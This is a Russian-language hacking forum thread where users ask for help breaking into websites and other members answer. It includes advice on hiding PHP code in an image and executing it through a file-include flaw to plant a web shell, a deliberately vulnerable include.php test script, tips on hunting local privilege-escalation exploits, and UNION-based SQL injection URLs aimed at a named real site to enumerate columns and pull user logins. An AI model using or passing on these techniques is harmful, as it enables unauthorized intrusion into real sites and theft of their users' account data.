Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LenarVS

    LenarVS Elder - Старейшина

    Joined:
    5 Jun 2008
    Messages:
    28
    Likes Received:
    2
    Reputations:
    0
    В общем нужно сламать или получить акк админа.Я отсканировал иксспайдеров и вот мне тут написало:

    Возможно ли получить куки админа? :D
     
  2. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    нет
     
  3. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    это куки которые тебе сервер на компе оставил. используя эту инфу нельзя получить куки админа.
     
  4. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    1. Расскажите пожалуйста реально ли сейчас залить шелл через аватарку? Работает ли способ внедрения своего кода в картинку?
    2. Есть 2 шелла на 2 серваках, выход на другие сайты закрыт. Тобишь папки других юзеров посмотреть не могу. Есть ли способы как то проникнуть в другие папки?
     
  5. none222

    none222 Guest

    Reputations:
    0
    1. Реально, работает. нужен инклуд или необходимые анстройки сервера (к примеру через .htaccess)
    2. Просто тупо прав не хватает. Ищи локальный сплойт под ОСь или под что-нить другой, что на сервере (например мод апача какой-нить бажный)
     
  6. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Спасибо.
    А по поводу аватарки. Я попробовал на локалке и что то не прокатило у меня. Правильно ли я делаю? Открыл в WinHex картинку, и дописал вконце ради теста <script>alert('test')</script>. Пробовал еще вводить <?phpinfo()?>. Но когда открыл в браузере никакого результата.
    Подскажите пожалуйста где ошибка.
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    не <?phpinfo()?>, а <?php phpinfo(); ?>
     
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    files/get/-114+union+select+1,2,3,4,5,6,7,8,9--/
     
    #5308 R1dex, 8 Feb 2009
    Last edited: 8 Feb 2009
    2 people like this.
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    R1dex, ух спс. Просто я дошел до 4 полей и не стал дальше расскручивать, потому что ошибки никакой не было... Удали пост, не хочу чтобы индексовался сайт...
     
  10. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    а разве есть разница? =)
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://php.ru/manual/language.basic-syntax.html
     
    1 person likes this.
  12. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Да я и так и так пробовал, я даже пробовал <?php echo "Test" ?> выводить, не получается в картинку закинуть. Правильно делаю что в конец файла ввожу код?
    Кто нибудь знает что на сервере должно быть чтобы это ошибка работала? Какие то опции, права может.
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Вот это как-бэ настораживает. :)
    Что значит "открыл в браузере" ? Это будет работать не при прямом обращении к файлу, а при инклуде. Надеюсь ты так и делаешь?
     
    1 person likes this.
  14. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    :D Нет)) я просто тестово на локалке прописал картинку, открываю ее путь и нифига, картинка цела и невредима :(
    Если не трудно, поподробнее объясните как оно проворачивается?
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Мде :)
    Если просто для теста, создай файл например такой
    include.php
    PHP:
    <?
    $a=$_GET['a'];
    include 
    "$a";
    ?>
    И обращайся к нему
    http://localhost/test/include/include.php?a=твоя/картинка/1.bmp

    А картинку (1.bmp) уже редактируй
     
    1 person likes this.
  16. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Спасибо) Будем попробовать.
     
  17. niva622

    niva622 New Member

    Joined:
    4 Nov 2008
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Всем здасьте объясните каким способом можно залить шелл на сайт где установлен двиг DLE
     
  18. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Возможно ли в php-инъекции как-нибудь вывести содержимое директории, а не файла?
     
  19. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 InFlame
    неа
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Привет. Я опять же с этим сайтом. Здесь нашел что в табле юзерс есть поле логин.
    Code:
    http://psp-club.ru/files/get/-114+union+select+COLUMN_NAME,2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USERS'+limit+10,1--/
    Но когда пытаюсь вывести
    Code:
    http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+users+limit+1,1/
    Ничего не выводит. Жду помощи, и конечно спасибо выражу +5.
     
Thread Status:
Not open for further replies.